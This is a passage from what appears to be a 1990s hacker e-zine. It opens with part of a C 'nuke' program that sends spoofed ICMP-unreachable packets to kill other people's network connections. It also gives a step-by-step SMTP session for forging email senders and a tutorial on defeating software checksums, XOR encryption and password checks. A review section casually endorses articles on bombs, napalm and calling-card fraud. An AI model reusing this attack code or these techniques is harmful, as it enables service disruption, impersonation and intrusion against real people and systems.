sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if( nleft == 1 ) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/*
* add back carry outs from top 16 bits to low 16 bits
*/
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return (answer);
}
int icmp_unreach(host,uhost,port,type)
char *host,*uhost;
int type,port;
{
struct sockaddr_in name;
struct sockaddr dest,uspoof;
struct icmp *mp;
struct tcphdr *tp;
struct protoent *proto;
int i,s,rc;
char *buf = (char *) malloc(sizeof(struct icmp)+64);
mp = (struct icmp *) buf;
if (resolve_host(host,&dest) <0) return(-1);
if (resolve_host(uhost,&uspoof) <0) return(-1);
if ((proto = getprotobyname("icmp")) == NULL) {
fputs("unable to determine protocol number of \"icmp\n",stderr);
return(-1);
}
if ((s = socket(AF_INET,SOCK_RAW,proto->p_proto)) <0 ) {
perror("opening raw socket");
return(-1);
}
/* Assign it to a port */
name.sin_family = AF_INET;
name.sin_addr.s_addr = INADDR_ANY;
name.sin_port = htons(port);
/* Bind it to the port */
rc = bind(s, (struct sockaddr *) & name, sizeof(name));
if (rc == -1) {
perror("bind");
return(-1);
}
if ((proto = getprotobyname("tcp")) == NULL) {
fputs("unable to determine protocol number of \"icmp\n",stderr);
return(-1);
}
/* the following messy stuff from Adam Glass (icmpsquish.c) */
bzero(mp,sizeof(struct icmp)+64);
mp->icmp_type = ICMP_UNREACH;
mp->icmp_code = type;
mp->icmp_ip.ip_v = IPVERSION;
mp->icmp_ip.ip_hl = 5;
mp->icmp_ip.ip_len = htons(sizeof(struct ip)+64+20);
mp->icmp_ip.ip_p = IPPROTO_TCP;
mp->icmp_ip.ip_src = ((struct sockaddr_in *) &dest)->sin_addr;
mp->icmp_ip.ip_dst = ((struct sockaddr_in *) &uspoof)->sin_addr;
mp->icmp_ip.ip_ttl = 179;
mp->icmp_cksum = 0;
tp = (struct tcphdr *) ((char *) &mp->icmp_ip+sizeof(struct ip));
tp->th_sport = 23;
tp->th_dport = htons(port);
tp->th_seq = htonl(0x275624F2);
mp->icmp_cksum = htons(in_cksum(mp,sizeof(struct icmp)+64));
if ((i= sendto(s,buf,sizeof(struct icmp)+64, 0,&dest,sizeof(dest))) <0 ) {
perror("sending icmp packet");
return(-1);
}
return(0);
}
void main(argc,argv)
int argc;
char **argv;
{
int i, type;
if ((argc <4) || (argc >5)) {
fprintf(stderr,"usage: nuke host uhost port [unreach_type]\n");
exit(1);
}
if (argc == 4) type = DEFAULT_UNREACH;
else type = resolve_unreach_type(argv[4]);
if ((type <0) ||(type >MAX_ICMP_UNREACH)) {
fputs("invalid unreachable type",stderr);
exit(1);
}
if (icmp_unreach(argv[1],argv[2],atoi(argv[3]),type) <0) exit(1);
exit(0);
}
---------------->8-------------------------------------------------------------
Well, this is the smallest stuff I have, and I'm not gonna BORE you with
kbyte's and kbyte's of source.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Busted for nothing ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Okay, I am being forced to type this by gun-point.. okay, maybe not to that
extreme, but it's pretty damn close! We accept no responsibility for the
writing of this article... Can I say that? No, I guess not.. oh well, I
tried... =)
For months we were receiving hundreds of dollars worth of bills through
Telecom for calls we didn't make. For example, a $300 phone call when I
was on holiday - there wasn't anyone home, so how could someone have had a
conversation if there wasn't anyone home to accept the phone call?
[NOTE: There isn't a pill box located anywhere NEAR my house, so don't go
screaming BEIGE BOXING!! - mind you, I had this weird dream that I had this
cute little pill box with wires sticking out of it which was right outside
of our house. Ohmigod, I think I must be going crazy... ANYway..]
These were directed through NZ-Direct from the US. Strange that. No one
had been over to the states recently and it hadn't stated that it was by
using a calling card, so that option was out. So, that required a monthly
scream at Telco about that, and eventually we stopped getting billed for
such calls (which I doubt even existed anyway).
Okay, now that's just the TIP of the iceburg. How would you like to be "con-
victed" for a "crime" you didn't commit? Well, that's basically what happen-
ed. And it was such a PETTY crime at that. Try VMB hacking!
It all started when we discovered a little VMB and everyone else happened to
find it too. What a coincidence.. *grin* Many of their boxes had the de-
fault passwords still attatched to them *sigh*. It's pathetic the way some
companies leave their systems so open and then blame someone else for "abusing
their system" when all we did was look around. Someone had editted the voice
prompts ['twasn't me, but you know who you are... *grin*] and _I_ ended up
taking the blame... hmm.. Anyway, a few of us ended up being "interrogated"
over this stupid prompt editting and leaving "abusive messages".
Anyway, the outcome was, I ended up being the only person accepting respon-
sibility for the entire incident. That included me having to write two let-
ters. Two copies of one letter - one copy to the guy who owned the VMB and
the other copy to the head of Telco security "for scrutiny" - and another
letter to the head of Wellington Telco security explaining the entire incident.
In the end, it was a waste of time not only for me - having to write two
letters - that didn't count the FIRST letter explaining why I shouldn't have
my phone line disconnected (they sent a letter to me saying that if I didn't
respond within a month, or summink, they'd disconnect it anyway - bunch o'
pricks, huh?).
In my final letter to the head of Wellington Telco Security, I reminded them
of the hundreds of dollars worth of calls I had to complain about each month.
FINALLY, something was actually done about it, and the hundred dollars worth
of calls were credited to my account.
The stupid thing was that I didn't do a thing, and had to put up with all the
crap that they threw at me. I also had my 3-way call cancelled.
In conclusion (they always said you have to include one in essays so I'd bet-
ter get extra practice =) ), I'd just like to say that they're a bunch of
dorks. Oh, and the new telephone account layout really sucks too.
[CyntaxEra Mature Mode: ON] *grin* In my opinon, it was better the way it
was, but that doesn't matter, does it? It's probably cheaper for them to do
it the new way. That would explain it all... =)
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Books 2 Read ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Title Author Stars
=================================================================
The Fools Run ...................... John Camp *****
Complicity ...................... Iain Banks ****
War Day ...................... Strieber & Kunetka *****
Blood Music ...................... Greg Bear ****?
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ The SLi Archive Subject list ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Okay, this is the list of all <well, most of> the file areas in the SLi
archives. It's a direct copy of the "/pub/README.NOW!" file and is up to
date as of the release date.
-sof-
Welcome to the SLi archives!
We hope your stay is, err, umm, "enlightening".
The operator of this system takes no responsibility for how the information
is used, BUT suggests STRONGLY you do NOT try ANYTHING, ANY of the files
describe! Some acts depicted in the files held within this archive describe
illegal or immoral acts. PLEASE use your commonsense when defining right
from wrong.
This archive exists to be a library of information, to show people a dif-
ferent outlook on the world and, in truth, a different outlook on life to
give them the opportunity to delve into the realms of adventure and know-
ledge - NOT to insight or teach people how to break the law.
Directories Sub Directories Description
-----------+-------------------+-------------------------------------------
./ai Artificial Intellegence.
./anarchy Anarchy files, explosives etc. (Likly
not to be here anymore as I'm against
this kinda shit now)
./art Art.
ansi If I find ppl up'ing ANSI, I'll shoot
them.
ascii Better than ANSI, I guess.
vt-xxx VT Animations at present.
./bbs
bbs-adds BBS adverts - numbers etc..
au
nz
other
uk
usa
misc
./busts Info on different busts.
./cc Info on creadit/calling cards, ATMs
etc.
./civil Civil liberties
./cons Conferences for H/P people - where when,
what happened and confs to come.
./corewars Files for Core Wars.
./cryptography Encrypting and Decrypting.
./cyber The world of the Cyberpunk.
./eff Information on the Electronic Freedom
Foundation - a US civial rights group.
./faq General Frequently Asked Questions.
./history A MUST to read you HAVE to read these
files they are linked to other direct-
ories all over the SLi archive but they
contain a history of different events in
the H/P world.
./howto How-to Guides to misc computer related
activities.
./incoming Incoming files.
./info These files are also contained in other
places. In this archive but are here be-
cause they should be read and because
in my opinion, they are important.
./internet Internet related files.
irc Internet Relay Chat [IRC] files.
sites Different FTP/TELNET sites.
./misc Just a lot of misc stuff with no real
home.
bible Obviously, the Bible.
./mischp Misc Hack/Phreak files.
cable Files to do with Cable TV/SKY.
lockpick Lock-picking related files.
./music Music related stuff.
lyrics Lyrics for songs etc.
misc Misc music related files.
mods Electronic music - most powerpacked for
Amiga.
vocs PC Sound files.
./nz New Zealand related files!
./passwds Password files for different systems.
Please rename the password file to be
"systemname-dd-mm-yy".
ie.
lamesystem-01-02-95.
./pharm Drug files (also probably going to be
removed for the same reason as
"anarchy")
./phreak Information on the Telephone System.
box Different phreaking "boxes".
cellfone Cellular Fones.
countrycodes Every Area/Country Code in the world.
fone-fraud Misc files on fone-fraud written by
Telco/Schools.
history History of the Telefone
misc Misc Files.
miscexe Misc Executables.
payfones Payphone related files.
pbx Private Branch eXchanges [PBXs].
standards Different CCITT/Phone Standards.
vmb Voice Mail Boxes [VMBs].
./pirate Breaking the (c) protection of S/W.
amiga
crack
coding
ibm
mac
./police Understand thy opposition
misc Miscellaneous files on the police.
./publications Different files from well-known authors
or organisations.
bruce_sterling Includes The Hacker Crackdown and inside
directories FSF_columns, catscan and
interzone.
david_faber
denning
john_gilmore Includes inside directories
Gilmore_v_NSA and inside that,
Clipper_FOIA and ITAR_FOIA.
john_perry_barlow
kapor
unsorted Miscellaneous unsorted publications.
./security Computer Security, Bug fixes and security.
hole descriptions.
8lgm Unix bugs
cert Computer Emergency Response Co-ordination
Centre.
cert_advisories A LOT of system security holes
clippings Misc clippings from diffrent usenet
sources.
misc Misc info.
dos DOS <PC> security files.
novell Novell netware.
tools Misc tools for DOS.
faq Frequently Asked Questions.
mac Misc files for the Macintosh.
misc Misc files on Computer Security.
os2 Files for OS2.
unix Files for UNIX based OS's.
antihacktools Anti-Hacker Tools
hackerssrc Various source for you hackers.
hp Files for hacking the Hewlett-Packard's
HPX000's.
vax Vax/Digital/VMS Security.
x.25 x.25 security holes
./sli Southern Lights inc. File Areas.
articles
interest Files that are related to SLi and are
an intrest to the rest of the H/P world
mags The SLi Mags are stored here.
warnings READ any files in here!
./strange Weird files that should have no place
to go :)
occult Stuff on the occult <black magic etc..>
ufo UFO files.
./system Files for different OS's.
amiga
asm
utils
dos
linux
./txts Like misc really.
./usenet Files/Msgs from usenet.
./virus Virus Creators and virus code. Any anti-
virus people feel free to use this info
to create virus killers.
./words Word files.
./zines Electronic Mags.
hpa Hacking, Phreaking and Anarchy Mags.
other Don't fit anywhere.
weird Very weird.
TOTAL DISK SPACE USED: 79055Kbytes [compressed]
Approximately 200Meg [uncompressed]
As of recent times, we have been updating the system at 1-2 Meg per day.
However, this cannot continue, as we have but 40Meg available disk space
remaining, but if anyone is willing to donate an IDE drive, we will be most
appreciative.
NOTE: The use of the word "removed" is being used as in "access to these
files will be removed from normal access users".
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Fake Mail ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Well, I dont know WHY this is in here, but just in case your interested
and DIDN'T know how to send fake Internet E-Mail here is a step by step
way to do it.
KEY: ignore []'s
*'s are lines that you type
type "telnet [target.comp] 25" at $prompt.
Trying [target.comp]...
Connected [target.comp].
Escape character is '^]'.
220-[target comp] [Mailer/Version] ready at [date/time]
220 ESMTP spoken here
*helo [where.from.comp]
250 [Target.comp] Hello [where.from.comp] [###.###.###], pleased to meet you
*mail from: [where@ever.you.like]
250 [where@ever.you.like]... Sender ok
*rcpt to: [target@target.comp]
250 [target@Target.comp]... Recipient ok
*data
354 Enter mail, end with "." on a line by itself
*hello
*.
250 DAA28466 Message accepted for delivery
*quit
221 [Target.Comp] closing connection
Connection closed by foreign host.
$
Well there you have it. Nice and easy. If you didnt know it already, I'm
a bit disappointed, but that's what we are here for. To teach YOU.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Elements of Data Deprotection ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Elements of Data Deprotection - by Thorium
Data Deprotection is one of my many hobbies. Others include bomb making,
programming, hacking, shooting, phreaking and appearing in court.
I am by no means an expert in this field, in fact I would regard myself as
a "seasoned ammeter". However, I feel that some tips I have picked up
over the years could help others. For this reason I am writing this file.
HOLD IT! You can't program? Well, this won't be much good to ya. You
might even need to know some assembler on whatever platform you use. I use
Amiga's usually (because they are simply the best personal computer - well
for assembler programmers anyway) so I know a fair bit of 68000 assembler.
It also helps to know a few common opcodes (what the actual text of
assembler language gets turned into, ie machine language) and how to use a
good debugger and disassembler.
So, if you are up to here, you're half way to being a K-RAD ELITE DUDE
anyway. In fact, you can probably do more interesting things that most who
call themselves "K-RAD ELITE DUDE"s - so why are you reading this? That's
right, you thought you might pick up a hint or two in an underground
publication. Ok, I hope you learn something.
First:
What do I mean "Data Deprotection" ???
This is probably not the best name for what I will actually describe, but
it is all I could think of. I mean "getting into data" - but not in the
sense of cryptanalasys and that sort of thing that requires a degree.
Data Deprotection has particular reference to more breaking encryption
algorithms, to getting around or breaking checksums and CRC's, and making
small but crucial changes to programs.
NOTE: Some people would call some uses of these skills "Cracking", and
assume that you go around breaking the protection on games. This is
distinctly possible, but before I go further, I would like to point out my
personal feelings on breaking program protection:
If you "crack" a game and distribute it, you are killing the software
industry. Anyway, you needed an original to crack - which someone had to
buy - so whoever bought it is stupid if they pay for something then let
everyone else have it. Basically, I do crack games and things, but I don't
spread what I do. The main reason for this is that I'm not good enough to
keep up with the "big boys" in Europe who crack the latest game overnight.
If I get hold of an original game, it is usually fairly old anyway, like a
year or two, and even back then they had some pretty tricky protection that
has taken a while to get around (like a few days work). Of course, there
are those dead simple games (try Eye of the Beholder II for a beginners
one). Thing is, everyone has it by the time I have finished with it. So I
don't crack to spread. I hardly crack games at all, since my access to
originals is limited. I crack only for the fun of it. And it is quite
fun to pitch your mind against those of the programmers - kind of like
chess play-by-purchase. Anyway, that's my ideas on cracking games etc. If
you want to, go ahead. It just kills the industry. This is why this
article will deal as little as possible with things that could be used to
crack games. It will deal more with accessing data from programs that you
aren't really 'sposed to access.
So, you have this program. You have made whatever change to it for
whatever reason, an it now comes up "corrupt data" or something along those
lines. Now, all you did was change a "Compare with password" to a "Don't
do anything" - so you know it should be able to work fine.
To see if a checksum is your problem, try running the program in it's
original form from your debugger. Just straight running it. If it still
comes up "error" then your debugger just 'aint good enough, since it is not
totally transparent to the program. It would require a discussion on each
debugger to fix this, and I only know those that I use.
If it ran OK, try placing a breakpoint at the place where you change things
and then running the program. Don't do anything at the breakpoint, just
run the program. If it fails, chances are you have a checksum. If not,
try putting the breakpoints around your place you changed, and after they
break, put them back. If it fails, it's probably some sort of check. If
not, something wierd is happening. The reason behind this is that almost
all debuggers will use breakpoints that actually change the memory that you
place a breakpoint on. So when a program goes to check it's memory, if
there is a breakpoint there, it won't find what it thought it would.
So, your program has a checksum? If not, you will need to do a little more
hacking to find out what's up. It usually 'aint too hard, but beyond the
scope of this text. Well, the next thing to do is FIND the checksum.
This can be done by placing a breakpoint on your place to change. If you
run it and without putting the breakpoint back after it occurs then your
program runs fine, then your check is AFTER the part you altered. If it
fails, then the checksum is BEFORE the part you altered. Pretty simple
really. You can further narrow this down by putting breakpoints at
strategic points throughout the code, and watching what happens when you
have a breakpoint in existence only up to there. You will eventually find
the area of code that does the check.
Once you have found this piece of code, you can figure out what it does.
Chances are your program is in some form of compiled language, so won't be
as easy to read as 100% assembler code, but by tracing through it, you can
usually figure out what's up. The skill is to look for critical points in
the code. THERE WILL (almost) ALWAYS BE A COMPARE after any sort of
checksum, wether it be a simple addition, or a complicated CRC. This
compare will then have a conditional statement - this is the crux of it.
All you do is remove the conditional and cover it with a constant - if it
is supposed to branch if a certain value, make it branch always. If it
branches only if NOT a certain value, make it a do-nothing set of
instructions. Sometimes there will be more than one check of the value, so
you must find all of them.
I feel I may have just skipped a vital idea. We changed the conditional
rather than the compare value because we want all future attempts at this
routine to be correct. This may be easier illustrated in, for example, a
trainer mode for a game. It is better to make UNLIMITED lives by removing
the conditional, than to have 9999999 lives - because you can still die.
Also it is a lot easier to change back to it's original form if you stuff
up, because you only need write down the opcodes, not the constant.
Now you have just gotten around a check in the program. There may be more,
and they may be hidden. So just test your program for full functionality.
Insert your original alteration, and test again. If you still have
problems, try this again. There could be multiple checks, checks on
checks, and all sorts of stuff.
You will notice now that the "difference" between your original program
and the altered one will only be a few key bytes. However it is how these
key bytes are placed that is important.
This is only one skill of many you will pick up as a hacker / cracker, but
one of the most used.
And now to make this entire section useless, I shall tell you how to get
around this type of hacking / cracking when you are on the programming end.
MAKE YOUR CHECK VARIABLES DO SOMETHING. If you calculate the CRC or some
vital code, don't just compare it, use it as a relative pointer into a data
segment. If the CRC is wrong, your system crashes. It's best to not even
COMPARE it, as this means you have the correct value sitting there. Just
assume it is right, and have the checksum or CRC or whatever in your
initialization code, but don't use it till much later on. This way your
hacker will likely give up.
And to make that useless - how to crack programs that use this technique
(gee, get the feeling every crack leads to a fix, and every fix leads to a
crack?). Just debug the program, figure out the correct value for the CRC
or whatever, and hard-code that in! Wipe over the CRC routine with one
that sets any variables it was supposed to correctly. Chances are it will
take up less space anyway!
So, we have done "actually changing a program" from the point of view of
making it run with changes. Now I shall cover (very basically) encryption
and decryption.
Encryption is mostly used to keep things from prying eyes. Which is
exactly what makes me want to break it. A program might have it's
datafiles stored encrypted to stop you getting unfair hints, or it might
have some of it's code encrypted that does some magical copy protection.
Essential to the breaking of codes with reference to programs, is that any
program has all the code necessary to decrypt it's data. PGP has all it's
code there in source form, what could be easier. However, this is where
the first problem starts - the KEY. If you know the key, you really dont
need to be reading this. If you don't know the key, you have to break the
algorithm. This is where it gets hard. PGP is more or less unbreakable,
because it uses a complicated algorithm and a complex and constantly
changing key (different for each person).
However most programs use only 1 key, and that is usually stored within
the program itself. The simplest of routines is that you get all your
data, and logically NOT it, ie all 1's become 0's and all 0's become 1's.
For this simple system, the algorithm IS the key. All you do is reverse
the algorithm, ie run it over again, and out comes your data.
Another logical operator, Exclusive-OR (sometimes refered to as EOR or
XOR), is commonly used. This is easiest thought of as a "selective not" -
where each bit in the "key" (source) says wether each bit in the
destination should be "NOT"'d. If the key bit is a 1, it is. So a key of
1010 and a dest of 1001 would become 0011. This also is also a reversible
algorithm, so all you do is run it over again. EOR has the advantage as a
algorithm with a "key" component. The KEY can be difficult to guess,
especially if it is more than 1 byte. However there are ways to get around
it. First, see if the program uses a fixed key - ie debug / disassemble it
and see. If so, there you have it. A little playing around and you have
your data.
This brings me to the next main point of this article - finding the EOR key
if you don't have one. This is actually really easy - all you need to do
is know some of the data that is after the EOR, and the length of the Key.
The length of the key can usually be determined from the algorithm, if it
is a continuous loop of EOR'ing a byte with some data, the key is a byte.
If it is going through a reference table (and you can't just dig this table
up) then you have to figure out how long it is. You also need to know at
least one keylength of decrypted data.
What you do is rely on the fact that 1010 EOR 1001 = 0011 and also 0011 EOR
1001 = 1010 - in other words, the key acting on the cypher yields the data,
and the data acting on the cypher yields the key! So all you do is write a
small program that gets your data, and eor's it with the cypher, and you
have the key. You can also build a key from some fragments of data by
guessing what the data in between might be - if this is text, it is usually
easy. Now you apply your key to the rest of the data. Simple!
However one problem is that you usually don't know where abouts in the
cypher your data comes from - so the solution is to write a program that
uses the data in every possible position in the cypher to yield every
possible key, and then use that key on every piece of cypher, and see what
comes out. This may take a while, and you need to be able to recognize the
data in it's correct form, easy if it's text, otherwise difficult.
Other common forms of encryption are addition / subtraction of constant or
changing values, rotation of bits (either in byte, word, or larger blocks),
and swapping blocks of data (be they bits, bytes or larger blocks). The
important thing to remember is that the program itself has to be able to
decrypt the data, so with enough care and patience you can find that bit
and copy it. Remember also that there can be more than one level of
encryption, and different sets of algorithms for different blocks of data.
The final thing I wish to deal with is the topic of "One Way Encryption" -
it is used sometimes to create keys for the above checks and decryption.
It is also useful if you can break the algorithm to make an automatic
password generator for encrypted files from a given program...
This situation is actually very common. It is a real pain. However, you
spot an algorithm that creates the key, possible from a password! Now,
somehow a password of any length is "shrunk" or "expanded" to fit a given
key length, and this is used to decrypt the data. This is called "One Way"
encryption, and is commonly used on passwords. The key created has little
bearing to the original password, and can't be recovered because there is
usually a "loss of significance" of data.
The simplest way to explain is to use the simplest one-way algorithm. Just
add all the bytes of a string together, in a byte. This way you are bound
to get overflow, rendering some data lost. However you end up with a byte
to use, and it will be a byte regardless of the length of the password.
So, if you can't get the password back, how do you pass the test? Simple -
you create a "garbageword". This is something that is functionally the
same as the password, but not actually the password. It is gained by
reversing the algorithm given the result.
In this simple algorithm all you do is get your byte key, and subtract as
many "A"'s as possible from it. Say your key was hex $BC (which
incedentially is the byte sum of the letters 'keys'. You can subtract 'A'
(hex $41) from it 2 times, leaving hex $3A, which is ':' which may not be
liked by our algorithm if it only takes text, so we find how much we have
to TAKE OFF it to get a letter or number. The closest number is '9' just
below it, so we use that, and add the extra 1 to one of the 'A's.
Therefore our garbageword is now 'AB9' - this is functionally the same as
'keys' for this algorithm, and so we have broken the lock.
You will hardly ever get an algorithm as simple as this one, but _ANY_ one
way encryption can be made to yeild a garbageword given the key if you
devote enough time to it.
And how do you stop this sort of breaking of your algorithms? Easy - make
it so complex that a hacker will never want to break it. - remember your
algorithm will always yeild the same key with the same input, so you don't
have to understand what you have written, you just need to check that it
makes different keys.
For example, try to break one that rotates a 2-byte key sotrage by the
lowest 4 bits of a letter to the right, then adds the letter, then rotates
left by the upper 4 bits, and EOR's the letter. This is not actually
_THAT_ hard to create a reverse algorithm for, it is just very hard to
create a printable garbageword. And as long as you make your entry of the
password only take printable letters, it will be hard to beat. And you
have a 1 in 65535 chance of fluking it. But by using a slightly more
complicated algorithm and 4 bytes of data, you would have a 1 in 4294967294
chance.
And an even "trickier" one to break is the algorithm in PowerPacker
encrypted executable files. Nico has thought it out well. You type in a
password, and it calcuates a word to compare and tell you if the password
is valid, but uses a totally separate algorithm to generate a longword for
the actual decryption key - so any garbageword you make from the compare
word is only going to have a 1 in 65535 change of being correct... Makes
things a little difficult , eh? And to make it harder the only encrypted
stuff is the actual crunched data - which seems to be crunched differently
than with no password as well, so I can't think of any way, short of formal
cryptanalasys, to get around it.
Well, that's about it from me, bit this is only the tip of the iceberg of
what there is to learn before you are even a half-competent hacker in these
here parts... But they are 3 important things that will lead to much more.
* Data wants to be free - so help it out *
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Review: 'ToT' ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
REVIEW: 'Tricks of the Trade' [ToT]
This is the first review that we will be including in the SLi Magazine, but
we hope to expand to reviewing a few others in the future.
[PLEASE NOTE: This is a critical review. Some have said it has been a little
too critical, perhaps that is the case, but the decision is to
be left to you, the reader.]
[BRIEFING]
WHAT? Electronic Magazine.
WHO? Distributed by: Raider.
Content by : Hype, Red Lion, Mutant-X, GreyRat, Nick,
Demogordon, X-Treme and Kevin.
WHEN? 24th December 1994
WHERE? Written by a group of Wellington H/P/A's. Perhaps a couple
of members out of the Wellington region seeming that at
present I am unable to pin-point the locations and identities
of a couple of the 'ToT' writers.
WHY? This question stumped me for a while as I can only give my
opinion. I came up with the following - a) for the pure
reason to educate others coming up in the H/P/A scene,
b) to give 'SLi' a taste of competition (this could be fun!)
or maybe even, c) to get a bit of the limelight.
These are in order of my suspicions from 'A' being the most
likely, to 'C' being the least likely.
HOW? Thought it was pretty damn obvious, but for those of you who
are interested... They got each of the writers to write their
articles down on paper then gave them to the editor to type out
on his dinky li'l 'puter...
[Editors Note: This seems to be the most TIME wasting story
I've EVER heard BUT that's what they did, so
'Raider' said. ]
[CRITICAL REVIEW]
This magazine isn't too bad for the first couple of issues, but admittably,
the first issue had a little more to be desired.
The idea of there being a variety is 'okay', but that depends on the indi-
viduals of which the magazine was/is designed for.
In my opinion, it appears that 'ToT' is designed with the lesser educated
in the H/P/A scene in mind. There were quite a number of articles in the
second issue of 'ToT' in comparison to any of the 'SLi' issues, but the
articles in 'ToT' were fairly brief and the ideas were a little out-dated.
It appears that 'ToT' is still in the process of deciding where it wants to
go - it would've been a better idea if plans had been made earlier and those
decisions would've made the foundation to start off with. With 'SLi', all
the needy decisions had been made PRIOR to even STARTING the magazine.
'SLi' was a group of companions FAR before it was a magazine - It's ad-
viable to know who's going to be there when you need them and whether they
can be trusted or not. The only way you can find out is by experimentation.
And that's what we did.
Anyway, going back to 'ToT' and it's purpose in the H/P/A scene...
After a good read throughout the magazine, I noticed that there is a fair
deal of information dealing with the Australian telephone network. It may
do a good job there, but WHO are the main people who are most probably
going to make use of the information stored within the bits and bytes?
I may be wrong, but I would say it would be us 'kiwi H/P/A's' who would
benefit most from the information. It looks as though 'ToT' is in too
much of a hurry to be known widespread - 'slow and steady wins the race'
would be a good phrase to put there.
Following is an 'article-by-article review' of 'ToT#2':
[REVIEW]
[Articles One-Three: Clickers]
Clickers. I haven't known of one which has worked yet, but that might just
be that those of whom have used them had not used them correctly. Strange
that they hadn't managed to work for about four people, but I guess you'll
just have to try them out for yourself considering that I haven't tried
them out myself.
At least you'll get your own BBQ lighter... Pretty sure that they'd make a
pretty good shock device - could be used as a stun gun if they're what I
think they are.
[Article Four: Travel Sickness]
The only flaw I could be sure on commenting on, is the lack of information
on what they [the tablets] actually do to the human body and whether or
not they're safe (or at least not lethal).
If ideas like this one are printed without thought to any consequences they
may have, we may find that a lot of people may suffer injuries due to the
lack of information given to the reader. Mind you, if you're silly enough
to try something without attempting to find out about it beforehand, then
you hold as much responsibility as the person responsible for the printing
of the information given.
[Article Five: Busted???]
Well, I guess I have no problems at all with this article. This is an art-
icle providing information to the reader which does not prompt for any
further action.
[Article Six: Credit Card Calling]
I had just recently covered this in the 'SLi#3' before I had any knowledge
of this article at all - it covered basically the same aspects but I'd tried
to explain it a little more to make sure it was understood better, but this
article is nonetheless okay, even if I disagree with some of the hints to a
certain degree. Still, a good article.
[Article Seven: Nut n Bolt Bomb]
It's already well-known that match heads contain explosive chemicals, but
I think that the writer of this article COULD have at least pointed out how
dangerous this can be - what with the flying shrapnel and the explosiveness
of the match head mixture. I was dismayed at the fact that I couldn't spot
a single safety warning right throughout the entire magazine at all.
[Note: This has already been covered in a few other mags prior to this one,
ie. early editions of Phrack among others.]
[Article Eight: Hacking Calling Cardz]
The article was a little vague, but (because of previous experiences with
this scenario) I could see what they were trying to explain. I find that
if you're more polite, you get what you want quicker instead of having to
bumble around with other unnecessary situations - no one likes a pushy
operator, so you can imagine how the victims would feel!
[Article Nine: One for the Neighbourz]
Well... I don't really have a comment on this one - read it for yourself..
I'm kind of, uh, "speachless". =)
[Article Ten: Hot Air Balloon]
A nicely presented article. I don't think I'd bother trying to build one
though considering I'd find it a fire-hazard if put together wrong and the
chances are, I'd do it wrong. Still, worth a try if you're into this sort
of thing and are competent in doing so. =)
[Article Eleven: Hidenburg Balloon]
This is just your basic acid-base explosion when you bring a naked flame
to Hydrogen[?]. A nice little bang, but watch for flying pieces of glass if
there are any - should be careful.
[Article Twelve: Hintz n Tipz for Pot Planting]
A nice little article on (as it says in the title) hints and tips for the
planting of marijuana plants. Not bad.. not bad at all. Even if originally
posted on "Bad Sector BBS" and then (with the writer's permission, of course)
transferred to the magazine - at least it's making use of your resources. =)
[Article Thirteen: How to Pass a Lie Detector Test]
A very entertaining article.. What can I say? I enjoyed reading it.
... But WHERE are you going to have to fake a lie detector test. If you're
foolish enuff to get caught, you can guarantee they have enough on you and
they WONT need you to confirm or deny it. Well, I guess if you're being in-
terrogated about certain activities concerning friends, this could be handy.
Still, a good read - you never know when you might need it.
[Article Fourteen: Just 4 Fun]
Uh, short. Very short in fact. A space filler?
[Article Fifteen: Corn Bombs]
A simple, no nonsense bomb.
[Article Sixteen: Fucking up a BBS]
Old concept. Has been brought up in MANY different places, magazines,
person-to-person chats, etc... Simple commonsense really. Telecom seems
to be tightening up the security of other peoples services - about time
they'd wised up to the old trick!
[Article Seventeen: Hacking CityNet/Genie]
The first part showed potential for something not to laugh at, although,
it was an old trick and many people had already been aware of the fact that
it was something done quite often. But, why bother when you can just walk
in and make your own account? Even one with a fake name. All you need to
do is simply USE YOUR COMMONSENSE. As for the hacking of CityNet/Genie
passwords with the user's names, you can't guarantee that it's going to
work. Is it really worth the trouble? Are you going to bother finding out
EVERY SINGLE USER NAME on the system and sit there trying them all day/night?
I guess you could spend a couple of minutes/hours/days writing a proggy/shell
script to do it for you, but I wouldn't want to tie my phoneline up!
The service is free, so isn't that enough?
[Article Eighteen: Strange Auzzie Numberz]
So, how many people out there, who've read this article, are going to fly,
float, swim, etc... to Australia? This is of no use to you if you're not
planning on visiting them within this half-decade or so. The chances of
any flaws, from today still being around by that time are pretty slim due to
the technology boom that should occur in the next few years. Although, this
is useful if you have friends/associates living in Aussie who you like to
keep in contact with.
[Article Nineteen: Hackerz Hit Telecom]
Yet another article dealing with the land mass north-west of New Zealand.
The article was okay for light reading, but was of little interest to my-
self. Similar to 'Article Five: Busted???' in that it is a "media reported"
incident.
[Article Twenty: 008 Diverter]
Refer to [Article Eighteen: Strange Auzzie Numberz].
[Article Twenty-One: Eureka]
One word: Childish...
Oh, and a couple more:
... next please...
[Article Twenty-Two: Making Napalm]
I highly disliked the example of a cat being used and I have already voiced
my opinion on this to 'Raider'. I'm not too sure whether they [the writers]
realize the effects of their ideas seeming that there are going to be those
people/kids around who will try ANYthing for the sheer sake of it. Other
